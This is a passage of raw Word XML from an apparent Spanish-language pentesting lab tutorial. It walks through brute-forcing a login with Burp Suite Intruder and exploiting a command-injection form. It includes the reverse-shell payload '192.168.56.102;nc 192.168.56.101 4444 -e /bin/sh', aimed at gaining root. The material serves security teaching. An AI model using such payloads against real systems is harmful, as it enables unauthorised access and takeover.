    <w:p w14:paraId="43E0AC49" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3E4C8B" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A0B2E62" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FF6728" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76251F40" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092CE386" w14:textId="33F343AF" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Continuamos en el “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intruder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” en la pestaña “positions” agregando los símbolos </w:t>
      </w:r>
      <w:r w:rsidRPr="00B35D3E">
        <w:t>§</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, que es el que no conocemos, o podemos aplicarlo a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> si es que no sabemos ninguno de los dos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21362B" w14:textId="16786F5D" w:rsidR="00B35D3E" w:rsidRDefault="00372615" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35D3E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30D17527" wp14:editId="36090206">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>189865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>211455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="3147060"/>
            <wp:effectExtent l="0" t="0" r="762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147060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0727C2BA" w14:textId="11084A1A" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B660867" w14:textId="77777777" w:rsidR="00ED5A6E" w:rsidRDefault="00B35D3E" w:rsidP="00ED5A6E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora vamos a la pestaña </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y seleccionamos una lista desde “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> …” en este caso como son </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> los que queremos saber cargamos esa lista y presionamos el botón de “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>atack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” para comenzar a buscar la contraseña:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA4FEEE" w14:textId="77777777" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00372615"/>
    <w:p w14:paraId="2627D00C" w14:textId="77777777" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00372615"/>
    <w:p w14:paraId="20345562" w14:textId="77777777" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00372615"/>
    <w:p w14:paraId="5C4A3C67" w14:textId="77777777" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00372615"/>
    <w:p w14:paraId="2F32DD60" w14:textId="77777777" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00372615"/>
    <w:p w14:paraId="7B9AEB58" w14:textId="77777777" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00372615"/>
    <w:p w14:paraId="345D1F0D" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35D3E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E882DE9" wp14:editId="407BD338">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>22860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="3132455"/>
            <wp:effectExtent l="0" t="0" r="762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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D0212" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DC57044" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A70A0C4" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD464A9" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282658A0" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6222B290" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6829203E" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC6D3E0" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BAFAB0" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A300243" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED39364" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CA2F01" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487A24BC" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00917E9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E0254E" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="008A2815" w:rsidP="00ED5A6E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Una vez que ha fin</w:t>
      </w:r>
      <w:r w:rsidR="00917E9D">
        <w:t xml:space="preserve">alizado </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intruder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de comparar las posibles contraseñas vemos y probamos aquellas que no sigan el patrón de longitud con el que se ha estado comportando el ataque, en este caso en particular podemos ver que el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” tiene una longitud menor a los otros </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0203CF1F" w14:textId="18F48F41" w:rsidR="008A2815" w:rsidRDefault="00372615" w:rsidP="008A2815">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="008A2815">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79562E30" wp14:editId="1286AD94">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>40640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="3173730"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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73730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="672D8B10" w14:textId="4D0A232F" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593CC47F" w14:textId="0E44B381" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4B2B42" w14:textId="13B80271" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC744C3" w14:textId="4DAC0A80" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A5D91D" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3586F312" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1527C299" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462DA8E2" w14:textId="77777777" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="132B5B98" w14:textId="77777777" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307716CB" w14:textId="77777777" w:rsidR="00372615" w:rsidRDefault="00372615" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31611EE1" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75EA7986" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F44F713" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C7753C" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E956C4" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B25A20" w14:textId="77777777" w:rsidR="008A2815" w:rsidRDefault="008A2815" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="008A2815">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A36F307">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="3157220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="508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157220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C382496" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E"/>
    <w:p w14:paraId="40E079B7" w14:textId="77777777" w:rsidR="00917E9D" w:rsidRDefault="00917E9D" w:rsidP="00B35D3E"/>
    <w:p w14:paraId="7EAA389E" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E"/>
    <w:p w14:paraId="634B0F1D" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRPr="00CD60DB" w:rsidRDefault="00D8019E" w:rsidP="00CD60DB"/>
    <w:p w14:paraId="518FC658" w14:textId="77777777" w:rsidR="00FB576D" w:rsidRDefault="00FB576D" w:rsidP="00FB576D"/>
    <w:p w14:paraId="13B8ECA6" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00FB576D"/>
    <w:p w14:paraId="385B4524" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00FB576D"/>
    <w:p w14:paraId="20784FB2" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00FB576D"/>
    <w:p w14:paraId="42961C6E" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00FB576D"/>
    <w:p w14:paraId="13CD8DB7" w14:textId="77777777" w:rsidR="00BD18DC" w:rsidRDefault="00BD18DC" w:rsidP="00BD18DC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerabilidad web de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FC27295" w14:textId="77777777" w:rsidR="00BD18DC" w:rsidRDefault="00BD18DC" w:rsidP="00BD18DC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Básicamente trata de una vulnerabilidad que nos permite ejecutar comando desde un formulario; es crítica porque podemos ingresar al sistema, escalar privilegios y tomar el control del mismo usando una cuenta de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012468">
        <w:t xml:space="preserve"> construyendo una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012468">
        <w:t>shella</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012468">
        <w:t xml:space="preserve"> reversa</w:t>
      </w:r>
      <w:r>
        <w:t>. Ingresamos una IP y después de un punto y coma para escapar el comando agregamos otro, como por ejemplo un “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008A15CB">
        <w:t xml:space="preserve"> para comprobar si tenemos respuesta desde el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B29472" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="008A15CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="008A15CB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29163CAB" wp14:editId="39F5392B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>11430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="3168015"/>
            <wp:effectExtent l="0" t="0" r="762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168015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF5BCD7" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="008A15CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705A85CE" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="008A15CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCC19DC" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="008A15CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4008E7A9" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="008A15CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30AC16F6" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="008A15CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F9A9AB" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="008A15CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08EED7D8" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="008A15CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DDB4153" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="008A15CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F65EE68" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="008A15CB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34780325" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="00012468"/>
    <w:p w14:paraId="7B1D638D" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRDefault="008A15CB" w:rsidP="00012468"/>
    <w:p w14:paraId="31811282" w14:textId="77777777" w:rsidR="008A15CB" w:rsidRPr="00BD18DC" w:rsidRDefault="0079376C" w:rsidP="00012468">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0079376C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55223FF7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1195705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="2886710"/>
            <wp:effectExtent l="0" t="0" r="7620" b="889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886710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00012468">
        <w:t>Con el comando “</w:t>
      </w:r>
      <w:r w:rsidR="00012468" w:rsidRPr="00012468">
        <w:t>192.168.56.102;nc 192.168.56.101 4444 -e /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012468" w:rsidRPr="00012468">
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012468" w:rsidRPr="00012468">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012468" w:rsidRPr="00012468">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012468">
        <w:t xml:space="preserve">” creamos una Shell reversa, ponemos en escucha el puerto 4444 para entrar al sistema desde nuestra consola de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012468">
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012468">
        <w:t xml:space="preserve"> Linux</w:t>
      </w:r>
      <w:r>
        <w:t>, la diferencia a hacerlo en la línea de comando a llevar la ejecución de comando a la consola es que podríamos elevar privilegios desde la consola</w:t>
      </w:r>
      <w:r w:rsidR="00012468">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAFC97D" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00FB576D"/>
    <w:p w14:paraId="55D18618" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00FB576D"/>
    <w:p w14:paraId="62121DB5" w14:textId="77777777" w:rsidR="00ED5A6E" w:rsidRDefault="00ED5A6E" w:rsidP="00FB576D"/>
    <w:p w14:paraId="6C0AA488" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00FB576D"/>
    <w:p w14:paraId="6F56F84E" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00FB576D"/>
    <w:p w14:paraId="7680AEC3" w14:textId="77777777" w:rsidR="0079376C" w:rsidRDefault="0079376C" w:rsidP="00FB576D"/>
    <w:p w14:paraId="41BD545E" w14:textId="77777777" w:rsidR="0079376C" w:rsidRDefault="0079376C" w:rsidP="00FB576D"/>
    <w:p w14:paraId="175A78C9" w14:textId="77777777" w:rsidR="0079376C" w:rsidRDefault="0079376C" w:rsidP="00FB576D"/>
    <w:p w14:paraId="04D87A4F" w14:textId="77777777" w:rsidR="0079376C" w:rsidRDefault="0079376C" w:rsidP="00FB576D"/>
    <w:p w14:paraId="7FD8E084" w14:textId="77777777" w:rsidR="0079376C" w:rsidRDefault="008A7234" w:rsidP="008A7234">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerabilidad File </w:t>
      </w:r>
